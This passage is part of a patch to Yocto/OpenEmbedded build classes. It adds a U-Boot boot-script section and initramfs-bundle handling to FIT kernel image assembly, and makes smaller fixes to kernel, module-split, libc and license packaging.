+ algo = "$bootscr_csum";
+ };
+ };
+EOF
+
+ if [ "${UBOOT_SIGN_ENABLE}" = "1" -a "${FIT_SIGN_INDIVIDUAL}" = "1" -a -n "$bootscr_sign_keyname" ] ; then
+ sed -i '$ d' $1
+ cat << EOF >> $1
+ signature-1 {
+ algo = "$bootscr_csum,$bootscr_sign_algo";
+ key-name-hint = "$bootscr_sign_keyname";
+ };
+ };
+EOF
+ fi
+}
+
+#
# Emit the fitImage ITS setup section
#
# $1 ... .its filename
@@ -185,7 +234,7 @@ fitimage_emit_section_setup() {
setup_csum="${FIT_HASH_ALG}"
cat << EOF >> ${1}
- setup@${2} {
+ setup-${2} {
description = "Linux setup.bin";
data = /incbin/("${3}");
type = "x86_setup";
@@ -194,7 +243,7 @@ fitimage_emit_section_setup() {
compression = "none";
load = <0x00090000>;
entry = <0x00090000>;
- hash@1 {
+ hash-1 {
algo = "${setup_csum}";
};
};
@@ -221,7 +270,7 @@ fitimage_emit_section_ramdisk() {
fi
cat << EOF >> ${1}
- ramdisk@${2} {
+ ramdisk-${2} {
description = "${INITRAMFS_IMAGE}";
data = /incbin/("${3}");
type = "ramdisk";
@@ -230,7 +279,7 @@ fitimage_emit_section_ramdisk() {
compression = "none";
${ramdisk_loadline}
${ramdisk_entryline}
- hash@1 {
+ hash-1 {
algo = "${ramdisk_csum}";
};
};
@@ -244,13 +293,15 @@ EOF
# $2 ... Linux kernel ID
# $3 ... DTB image name
# $4 ... ramdisk ID
-# $5 ... config ID
-# $6 ... default flag
+# $5 ... u-boot script ID
+# $6 ... config ID
+# $7 ... default flag
fitimage_emit_section_config() {
conf_csum="${FIT_HASH_ALG}"
conf_sign_algo="${FIT_SIGN_ALG}"
- if [ -n "${UBOOT_SIGN_ENABLE}" ] ; then
+ conf_padding_algo="${FIT_PAD_ALG}"
+ if [ "${UBOOT_SIGN_ENABLE}" = "1" ] ; then
conf_sign_keyname="${UBOOT_SIGN_KEYNAME}"
fi
@@ -260,45 +311,53 @@ fitimage_emit_section_config() {
kernel_line=""
fdt_line=""
ramdisk_line=""
+ bootscr_line=""
setup_line=""
default_line=""
if [ -n "${2}" ]; then
conf_desc="Linux kernel"
sep=", "
- kernel_line="kernel = \"kernel@${2}\";"
+ kernel_line="kernel = \"kernel-${2}\";"
fi
if [ -n "${3}" ]; then
conf_desc="${conf_desc}${sep}FDT blob"
sep=", "
- fdt_line="fdt = \"fdt@${3}\";"
+ fdt_line="fdt = \"fdt-${3}\";"
fi
if [ -n "${4}" ]; then
conf_desc="${conf_desc}${sep}ramdisk"
sep=", "
- ramdisk_line="ramdisk = \"ramdisk@${4}\";"
+ ramdisk_line="ramdisk = \"ramdisk-${4}\";"
fi
if [ -n "${5}" ]; then
+ conf_desc="${conf_desc}${sep}u-boot script"
+ sep=", "
+ bootscr_line="bootscr = \"bootscr-${5}\";"
+ fi
+
+ if [ -n "${6}" ]; then
conf_desc="${conf_desc}${sep}setup"
- setup_line="setup = \"setup@${5}\";"
+ setup_line="setup = \"setup-${6}\";"
fi
- if [ "${6}" = "1" ]; then
- default_line="default = \"conf@${3}\";"
+ if [ "${7}" = "1" ]; then
+ default_line="default = \"conf-${3}\";"
fi
cat << EOF >> ${1}
${default_line}
- conf@${3} {
- description = "${6} ${conf_desc}";
+ conf-${3} {
+ description = "${7} ${conf_desc}";
${kernel_line}
${fdt_line}
${ramdisk_line}
+ ${bootscr_line}
${setup_line}
- hash@1 {
+ hash-1 {
algo = "${conf_csum}";
};
EOF
@@ -324,15 +383,21 @@ EOF
fi
if [ -n "${5}" ]; then
+ sign_line="${sign_line}${sep}\"bootscr\""
+ sep=", "
+ fi
+
+ if [ -n "${6}" ]; then
sign_line="${sign_line}${sep}\"setup\""
fi
sign_line="${sign_line};"
cat << EOF >> ${1}
- signature@1 {
+ signature-1 {
algo = "${conf_csum},${conf_sign_algo}";
key-name-hint = "${conf_sign_keyname}";
+ padding = "${conf_padding_algo}";
${sign_line}
};
EOF
@@ -355,6 +420,7 @@ fitimage_assemble() {
DTBS=""
ramdiskcount=${3}
setupcount=""
+ bootscr_id=""
rm -f ${1} arch/${ARCH}/boot/${2}
fitimage_emit_fit_header ${1}
@@ -365,7 +431,7 @@ fitimage_assemble() {
fitimage_emit_section_maint ${1} imagestart
uboot_prep_kimage
- fitimage_emit_section_kernel ${1} "${kernelcount}" linux.bin "${linux_comp}"
+ fitimage_emit_section_kernel $1 $kernelcount linux.bin "$linux_comp"
#
# Step 2: Prepare a DTB image section
@@ -399,7 +465,21 @@ fitimage_assemble() {
fi
#
- # Step 3: Prepare a setup section. (For x86)
+ # Step 3: Prepare a u-boot script section
+ #
+
+ if [ -n "${UBOOT_ENV}" ] && [ -d "${STAGING_DIR_HOST}/boot" ]; then
+ if [ -e "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY}" ]; then
+ cp ${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} ${B}
+ bootscr_id="${UBOOT_ENV_BINARY}"
+ fitimage_emit_section_boot_script ${1} "${bootscr_id}" ${UBOOT_ENV_BINARY}
+ else
+ bbwarn "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} not found."
+ fi
+ fi
+
+ #
+ # Step 4: Prepare a setup section. (For x86)
#
if [ -e arch/${ARCH}/boot/setup.bin ]; then
setupcount=1
@@ -407,9 +487,9 @@ fitimage_assemble() {
fi
#
- # Step 4: Prepare a ramdisk section.
+ # Step 5: Prepare a ramdisk section.
#
- if [ "x${ramdiskcount}" = "x1" ] ; then
+ if [ "x${ramdiskcount}" = "x1" ] && [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
# Find and use the first initramfs image archive type we find
for img in cpio.lz4 cpio.lzo cpio.lzma cpio.xz cpio.gz ext2.gz cpio; do
initramfs_path="${DEPLOY_DIR_IMAGE}/${INITRAMFS_IMAGE_NAME}.${img}"
@@ -430,7 +510,7 @@ fitimage_assemble() {
fi
#
- # Step 5: Prepare a configurations section
+ # Step 6: Prepare a configurations section
#
fitimage_emit_section_maint ${1} confstart
@@ -439,9 +519,9 @@ fitimage_assemble() {
for DTB in ${DTBS}; do
dtb_ext=${DTB##*.}
if [ "${dtb_ext}" = "dtbo" ]; then
- fitimage_emit_section_config ${1} "" "${DTB}" "" "" "`expr ${i} = ${dtbcount}`"
+ fitimage_emit_section_config ${1} "" "${DTB}" "" "${bootscr_id}" "" "`expr ${i} = ${dtbcount}`"
else
- fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${setupcount}" "`expr ${i} = ${dtbcount}`"
+ fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${bootscr_id}" "${setupcount}" "`expr ${i} = ${dtbcount}`"
fi
i=`expr ${i} + 1`
done
@@ -452,7 +532,7 @@ fitimage_assemble() {
fitimage_emit_section_maint ${1} fitend
#
- # Step 6: Assemble the image
+ # Step 7: Assemble the image
#
uboot-mkimage \
${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
@@ -460,7 +540,7 @@ fitimage_assemble() {
arch/${ARCH}/boot/${2}
#
- # Step 7: Sign the image and add public key to U-Boot dtb
+ # Step 8: Sign the image and add public key to U-Boot dtb
#
if [ "x${UBOOT_SIGN_ENABLE}" = "x1" ] ; then
add_key_to_u_boot=""
@@ -474,7 +554,8 @@ fitimage_assemble() {
${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
-F -k "${UBOOT_SIGN_KEYDIR}" \
$add_key_to_u_boot \
- -r arch/${ARCH}/boot/${2}
+ -r arch/${ARCH}/boot/${2} \
+ ${UBOOT_MKIMAGE_SIGN_ARGS}
fi
}
@@ -491,7 +572,11 @@ do_assemble_fitimage_initramfs() {
if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage" && \
test -n "${INITRAMFS_IMAGE}" ; then
cd ${B}
- fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1
+ if [ "${INITRAMFS_IMAGE_BUNDLE}" = "1" ]; then
+ fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage ""
+ else
+ fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1
+ fi
fi
}
@@ -502,22 +587,32 @@ kernel_do_deploy[vardepsexclude] = "DATETIME"
kernel_do_deploy_append() {
# Update deploy directory
if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage"; then
- echo "Copying fit-image.its source file..."
- install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its"
- ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}"
+ if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
+ echo "Copying fit-image.its source file..."
+ install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its"
+ if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+ ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}"
+ fi
- echo "Copying linux.bin file..."
- install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin
- ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}"
+ echo "Copying linux.bin file..."
+ install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin
+ if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+ ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}"
+ fi
+ fi
if [ -n "${INITRAMFS_IMAGE}" ]; then
echo "Copying fit-image-${INITRAMFS_IMAGE}.its source file..."
install -m 0644 ${B}/fit-image-${INITRAMFS_IMAGE}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its"
ln -snf fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
- echo "Copying fitImage-${INITRAMFS_IMAGE} file..."
- install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin"
- ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
+ if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
+ echo "Copying fitImage-${INITRAMFS_IMAGE} file..."
+ install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin"
+ if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+ ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
+ fi
+ fi
fi
if [ "${UBOOT_SIGN_ENABLE}" = "1" -a -n "${UBOOT_DTB_BINARY}" ] ; then
# UBOOT_DTB_IMAGE is a realfile, but we can't use
@@ -527,3 +622,13 @@ kernel_do_deploy_append() {
fi
fi
}
+
+# The function below performs the following in case of initramfs bundles:
+# - Removes do_assemble_fitimage. FIT generation is done through
+# do_assemble_fitimage_initramfs. do_assemble_fitimage is not needed
+# and should not be part of the tasks to be executed.
+python () {
+ d.appendVarFlag('do_compile', 'vardeps', ' INITRAMFS_IMAGE_BUNDLE')
+ if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
+ bb.build.deltask('do_assemble_fitimage', d)
+}
diff --git a/meta/classes/kernel-module-split.bbclass b/meta/classes/kernel-module-split.bbclass
index c8ede26996..baa32e0a90 100644
--- a/meta/classes/kernel-module-split.bbclass
+++ b/meta/classes/kernel-module-split.bbclass
@@ -120,7 +120,10 @@ python split_kernel_module_packages () {
files = d.getVar('FILES_%s' % pkg)
files = "%s /etc/modules-load.d/%s.conf /etc/modprobe.d/%s.conf" % (files, basename, basename)
d.setVar('FILES_%s' % pkg, files)
- d.setVar('CONFFILES_%s' % pkg, files)
+
+ conffiles = d.getVar('CONFFILES_%s' % pkg)
+ conffiles = "%s /etc/modules-load.d/%s.conf /etc/modprobe.d/%s.conf" % (conffiles, basename, basename)
+ d.setVar('CONFFILES_%s' % pkg, conffiles)
if "description" in vals:
old_desc = d.getVar('DESCRIPTION_' + pkg) or ""
diff --git a/meta/classes/kernel-yocto.bbclass b/meta/classes/kernel-yocto.bbclass
index ec5fb7b1de..2abbc2ff66 100644
--- a/meta/classes/kernel-yocto.bbclass
+++ b/meta/classes/kernel-yocto.bbclass
@@ -105,6 +105,8 @@ do_kernel_metadata() {
cd ${S}
export KMETA=${KMETA}
+ bbnote "do_kernel_metadata: for summary/debug, set KCONF_AUDIT_LEVEL > 0"
+
# if kernel tools are available in-tree, they are preferred
# and are placed on the path before any external tools. Unless
# the external tools flag is set, in that case we do nothing.
@@ -192,7 +194,7 @@ do_kernel_metadata() {
# SRC_URI. If they were supplied, we convert them into include directives
# for the update part of the process
for f in ${feat_dirs}; do
- if [ -d "${WORKDIR}/$f/meta" ]; then
+ if [ -d "${WORKDIR}/$f/kernel-meta" ]; then
includes="$includes -I${WORKDIR}/$f/kernel-meta"
elif [ -d "${WORKDIR}/../oe-local-files/$f" ]; then
includes="$includes -I${WORKDIR}/../oe-local-files/$f"
@@ -252,6 +254,23 @@ do_kernel_metadata() {
bbfatal_log "Could not generate configuration queue for ${KMACHINE}."
fi
fi
+
+ if [ ${KCONF_AUDIT_LEVEL} -gt 0 ]; then
+ bbnote "kernel meta data summary for ${KMACHINE} (${LINUX_KERNEL_TYPE}):"
+ bbnote "======================================================================"
+ if [ -n "${KMETA_EXTERNAL_BSPS}" ]; then
+ bbnote "Non kernel-cache (external) bsp"
+ fi
+ bbnote "BSP entry point / definition: $bsp_definition"
+ if [ -n "$in_tree_defconfig" ]; then
+ bbnote "KBUILD_DEFCONFIG: ${KBUILD_DEFCONFIG}"
+ fi
+ bbnote "Fragments from SRC_URI: $sccs_from_src_uri"
+ bbnote "KERNEL_FEATURES: $KERNEL_FEATURES_FINAL"
+ bbnote "Final scc/cfg list: $sccs_defconfig $bsp_definition $sccs $KERNEL_FEATURES_FINAL"
+ fi
+
+ set -e
}
do_patch() {
@@ -281,6 +300,8 @@ do_patch() {
fi
done
fi
+
+ set -e
}
do_kernel_checkout() {
@@ -303,6 +324,21 @@ do_kernel_checkout() {
fi
fi
cd ${S}
+
+ # convert any remote branches to local tracking ones
+ for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
+ b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
+ git show-ref --quiet --verify -- "refs/heads/$b"
+ if [ $? -ne 0 ]; then
+ git branch $b $i > /dev/null
+ fi
+ done
+
+ # Create a working tree copy of the kernel by checking out a branch
+ machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
+
+ # checkout and clobber any unimportant files
+ git checkout -f ${machine_branch}
else
# case: we have no git repository at all.
# To support low bandwidth options for building the kernel, we'll just
@@ -325,20 +361,7 @@ do_kernel_checkout() {
git clean -d -f
fi
- # convert any remote branches to local tracking ones
- for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
- b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
- git show-ref --quiet --verify -- "refs/heads/$b"
- if [ $? -ne 0 ]; then
- git branch $b $i > /dev/null
- fi
- done
-
- # Create a working tree copy of the kernel by checking out a branch
- machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
-
- # checkout and clobber any unimportant files
- git checkout -f ${machine_branch}
+ set -e
}
do_kernel_checkout[dirs] = "${S}"
@@ -506,6 +529,8 @@ do_validate_branches() {
kgit-s2q --clean
fi
fi
+
+ set -e
}
OE_TERMINAL_EXPORTS += "KBUILD_OUTPUT"
diff --git a/meta/classes/kernel.bbclass b/meta/classes/kernel.bbclass
index 9e3c34ad48..ca7530095e 100644
--- a/meta/classes/kernel.bbclass
+++ b/meta/classes/kernel.bbclass
@@ -1,5 +1,7 @@
inherit linux-kernel-base kernel-module-split
+COMPATIBLE_HOST = ".*-linux"
+
KERNEL_PACKAGE_NAME ??= "kernel"
KERNEL_DEPLOYSUBDIR ??= "${@ "" if (d.getVar("KERNEL_PACKAGE_NAME") == "kernel") else d.getVar("KERNEL_PACKAGE_NAME") }"
@@ -73,7 +75,7 @@ python __anonymous () {
# KERNEL_IMAGETYPES may contain a mixture of image types supported directly
# by the kernel build system and types which are created by post-processing
# the output of the kernel build system (e.g. compressing vmlinux ->
- # vmlinux.gz in kernel_do_compile()).
+ # vmlinux.gz in kernel_do_transform_kernel()).
# KERNEL_IMAGETYPE_FOR_MAKE should contain only image types supported
# directly by the kernel build system.
if not d.getVar('KERNEL_IMAGETYPE_FOR_MAKE'):
@@ -89,6 +91,8 @@ python __anonymous () {
imagedest = d.getVar('KERNEL_IMAGEDEST')
for type in types.split():
+ if bb.data.inherits_class('nopackages', d):
+ continue
typelower = type.lower()
d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
d.setVar('FILES_' + kname + '-image-' + typelower, '/' + imagedest + '/' + type + '-${KERNEL_VERSION_NAME}' + ' /' + imagedest + '/' + type)
@@ -102,6 +106,8 @@ python __anonymous () {
# standalone for use by wic and other tools.
if image:
d.appendVarFlag('do_bundle_initramfs', 'depends', ' ${INITRAMFS_IMAGE}:do_image_complete')
+ if image and bb.utils.to_boolean(d.getVar('INITRAMFS_IMAGE_BUNDLE')):
+ bb.build.addtask('do_transform_bundled_initramfs', 'do_deploy', 'do_bundle_initramfs', d)
# NOTE: setting INITRAMFS_TASK is for backward compatibility
# The preferred method is to set INITRAMFS_IMAGE, because
@@ -137,13 +143,14 @@ do_unpack[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILD
do_clean[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILDDIR}"
python do_symlink_kernsrc () {
s = d.getVar("S")
- if s[-1] == '/':
- # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as directory name and fail
- s=s[:-1]
kernsrc = d.getVar("STAGING_KERNEL_DIR")
if s != kernsrc:
bb.utils.mkdirhier(kernsrc)
bb.utils.remove(kernsrc, recurse=True)
+ if s[-1] == '/':
+ # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as
+ # directory name and fail
+ s = s[:-1]
if d.getVar("EXTERNALSRC"):
# With EXTERNALSRC S will not be wiped so we can symlink to it
os.symlink(s, kernsrc)
@@ -192,6 +199,8 @@ UBOOT_LOADADDRESS ?= "${UBOOT_ENTRYPOINT}"
KERNEL_EXTRA_ARGS ?= ""
EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
+EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}""
+
KERNEL_ALT_IMAGETYPE ??= ""
copy_initramfs() {
@@ -274,6 +283,14 @@ do_bundle_initramfs () {
}
do_bundle_initramfs[dirs] = "${B}"
+kernel_do_transform_bundled_initramfs() {
+ # vmlinux.gz is not built by kernel
+ if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
+ gzip -9cn < ${KERNEL_OUTPUT_DIR}/vmlinux.initramfs > ${KERNEL_OUTPUT_DIR}/vmlinux.gz.initramfs
+ fi
+}
+do_transform_bundled_initramfs[dirs] = "${B}"
+
python do_devshell_prepend () {
os.environ["LDFLAGS"] = ''
}
@@ -305,6 +322,10 @@ kernel_do_compile() {
export KBUILD_BUILD_TIMESTAMP="$ts"
export KCONFIG_NOTIMESTAMP=1
bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
+ else
+ ts=`LC_ALL=C date`
+ export KBUILD_BUILD_TIMESTAMP="$ts"
+ bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
fi
# The $use_alternate_initrd is only set from
# do_bundle_initramfs() This variable is specifically for the
@@ -323,12 +344,17 @@ kernel_do_compile() {
for typeformake in ${KERNEL_IMAGETYPE_FOR_MAKE} ; do
oe_runmake ${typeformake} CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS} $use_alternate_initrd
done
+}
+
+kernel_do_transform_kernel() {
# vmlinux.gz is not built by kernel
if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
mkdir -p "${KERNEL_OUTPUT_DIR}"
gzip -9cn < ${B}/vmlinux > "${KERNEL_OUTPUT_DIR}/vmlinux.gz"
fi
}
+do_transform_kernel[dirs] = "${B}"
+addtask transform_kernel after do_compile before do_install
do_compile_kernelmodules() {
unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
@@ -346,6 +372,10 @@ do_compile_kernelmodules() {
export KBUILD_BUILD_TIMESTAMP="$ts"
export KCONFIG_NOTIMESTAMP=1
bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
+ else
+ ts=`LC_ALL=C date`
+ export KBUILD_BUILD_TIMESTAMP="$ts"
+ bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
fi
if (grep -q -i -e '^CONFIG_MODULES=y$' ${B}/.config); then
cc_extra=$(get_cc_option)
@@ -358,6 +388,10 @@ do_compile_kernelmodules() {
# other kernel modules and will look at this
# file to do symbol lookups
cp ${B}/Module.symvers ${STAGING_KERNEL_BUILDDIR}/
+ # 5.10+ kernels have module.lds that we need to copy for external module builds
+ if [ -e "${B}/scripts/module.lds" ]; then
+ install -Dm 0644 ${B}/scripts/module.lds ${STAGING_KERNEL_BUILDDIR}/scripts/module.lds
+ fi
else
bbnote "no modules to compile"
fi
@@ -371,8 +405,8 @@ kernel_do_install() {
unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
if (grep -q -i -e '^CONFIG_MODULES=y$' .config); then
oe_runmake DEPMOD=echo MODLIB=${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION} INSTALL_FW_PATH=${D}${nonarch_base_libdir}/firmware modules_install
- rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build"
- rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source"
+ rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build"
+ rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source"
# If the kernel/ directory is empty remove it to prevent QA issues
rmdir --ignore-fail-on-non-empty "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/kernel"
else
@@ -384,12 +418,26 @@ kernel_do_install() {
#
install -d ${D}/${KERNEL_IMAGEDEST}
install -d ${D}/boot
+
+ #
+ # When including an initramfs bundle inside a FIT image, the fitImage is created after the install task
+ # by do_assemble_fitimage_initramfs.
+ # This happens after the generation of the initramfs bundle (done by do_bundle_initramfs).
+ # So, at the level of the install task we should not try to install the fitImage. fitImage is still not
+ # generated yet.
+ # After the generation of the fitImage, the deploy task copies the fitImage from the build directory to
+ # the deploy folder.
+ #
+
for imageType in ${KERNEL_IMAGETYPES} ; do
- install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION}
- if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then
- ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType}
+ if [ $imageType != "fitImage" ] || [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ] ; then
+ install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION}
+ if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then
+ ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType}
+ fi
fi
done
+
install -m 0644 System.map ${D}/boot/System.map-${KERNEL_VERSION}
install -m 0644 .config ${D}/boot/config-${KERNEL_VERSION}
install -m 0644 vmlinux ${D}/boot/vmlinux-${KERNEL_VERSION}
@@ -397,7 +445,6 @@ kernel_do_install() {
install -d ${D}${sysconfdir}/modules-load.d
install -d ${D}${sysconfdir}/modprobe.d
}
-do_install[prefuncs] += "package_get_auto_pr"
# Must be ran no earlier than after do_kernel_checkout or else Makefile won't be in ${S}/Makefile
do_kernel_version_sanity_check() {
@@ -563,11 +610,11 @@ do_savedefconfig() {
do_savedefconfig[nostamp] = "1"
addtask savedefconfig after do_configure
-inherit cml1
+inherit cml1 pkgconfig
-KCONFIG_CONFIG_COMMAND_append = " HOSTLDFLAGS='${BUILD_LDFLAGS}'"
+KCONFIG_CONFIG_COMMAND_append = " LD='${KERNEL_LD}' HOSTLDFLAGS='${BUILD_LDFLAGS}'"
-EXPORT_FUNCTIONS do_compile do_install do_configure
+EXPORT_FUNCTIONS do_compile do_transform_kernel do_transform_bundled_initramfs do_install do_configure
# kernel-base becomes kernel-${KERNEL_VERSION}
# kernel-image becomes kernel-image-${KERNEL_VERSION}
@@ -673,7 +720,7 @@ do_sizecheck() {
at_least_one_fits=
for imageType in ${KERNEL_IMAGETYPES} ; do
size=`du -ks ${B}/${KERNEL_OUTPUT_DIR}/$imageType | awk '{print $1}'`
- if [ $size -ge ${KERNEL_IMAGE_MAXSIZE} ]; then
+ if [ $size -gt ${KERNEL_IMAGE_MAXSIZE} ]; then
bbwarn "This kernel $imageType (size=$size(K) > ${KERNEL_IMAGE_MAXSIZE}(K)) is too big for your device."
else
at_least_one_fits=y
diff --git a/meta/classes/libc-package.bbclass b/meta/classes/libc-package.bbclass
index de3b4250c7..72f489d673 100644
--- a/meta/classes/libc-package.bbclass
+++ b/meta/classes/libc-package.bbclass
@@ -45,6 +45,7 @@ PACKAGE_NO_GCONV ?= "0"
OVERRIDES_append = ":${TARGET_ARCH}-${TARGET_OS}"
locale_base_postinst_ontarget() {
+mkdir ${libdir}/locale
localedef --inputfile=${datadir}/i18n/locales/%s --charmap=%s %s
}
@@ -355,7 +356,7 @@ python package_do_split_gconvs () {
m.write("\t@echo 'Progress %d/%d'\n" % (i, total))
m.write("\t" + makerecipe + "\n\n")
d.setVar("EXTRA_OEMAKE", "-C %s ${PARALLEL_MAKE}" % (os.path.dirname(makefile)))
- d.setVarFlag("oe_runmake", "progress", "outof:Progress\s(\d+)/(\d+)")
+ d.setVarFlag("oe_runmake", "progress", r"outof:Progress\s(\d+)/(\d+)")
bb.note("Executing binary locale generation makefile")
bb.build.exec_func("oe_runmake", d)
bb.note("collecting binary locales from locale tree")
diff --git a/meta/classes/license.bbclass b/meta/classes/license.bbclass
index f90176d6c0..806b5069fd 100644
--- a/meta/classes/license.bbclass
+++ b/meta/classes/license.bbclass
@@ -31,7 +31,8 @@ python do_populate_lic() {
f.write("%s: %s\n" % (key, info[key]))
}
-# it would be better to copy them in do_install_append, but find_license_filesa is python
+PSEUDO_IGNORE_PATHS .= ",${@','.join(((d.getVar('COMMON_LICENSE_DIR') or '') + ' ' + (d.getVar('LICENSE_PATH') or '') + ' ' + d.getVar('COREBASE') + '/meta/COPYING').split())}"
+# it would be better to copy them in do_install:append, but find_license_filesa is python
python perform_packagecopy_prepend () {
enabled = oe.data.typed_value('LICENSE_CREATE_PACKAGE', d)
if d.getVar('CLASSOVERRIDE') == 'class-target' and enabled:
@@ -90,17 +91,17 @@ def copy_license_files(lic_files_paths, destdir):
os.link(src, dst)
except OSError as err:
if err.errno == errno.EXDEV:
- # Copy license files if hard-link is not possible even if st_dev is the
+ # Copy license files if hardlink is not possible even if st_dev is the
# same on source and destination (docker container with device-mapper?)
canlink = False
else:
raise
- # Only chown if we did hardling, and, we're running under pseudo
+ # Only chown if we did hardlink and we're running under pseudo
if canlink and os.environ.get('PSEUDO_DISABLED') == '0':
os.chown(dst,0,0)
if not canlink:
- begin_idx = int(beginline)-1 if beginline is not None else None
- end_idx = int(endline) if endline is not None else None
+ begin_idx = max(0, int(beginline) - 1) if beginline is not None else None
+ end_idx = max(0, int(endline)) if endline is not None else None
if begin_idx is None and end_idx is None:
shutil.copyfile(src, dst)
else:
@@ -152,6 +153,10 @@ def find_license_files(d):
find_license(node.s.replace("+", "").replace("*", ""))
self.generic_visit(node)
+ def visit_Constant(self, node):
+ find_license(node.value.replace("+", "").replace("*", ""))
+ self.generic_visit(node)
+
def find_license(license_type):
try:
bb.utils.mkdirhier(gen_lic_dest)
diff --git a/meta/classes/license_image.bbclass b/meta/classes/license_image.bbclass
index a8c72da3cb..325b3cbba7 100644
--- a/meta/classes/license_image.bbclass
+++ b/meta/classes/license_image.bbclass
@@ -1,3 +1,5 @@
+ROOTFS_LICENSE_DIR = "${IMAGE_ROOTFS}/usr/share/common-licenses"
+
python write_package_manifest() {
# Get list of installed packages
license_image_dir = d.expand('${LICENSE_DIRECTORY}/${IMAGE_NAME}')
@@ -7,8 +9,8 @@ python write_package_manifest() {
pkgs = image_list_installed_packages(d)
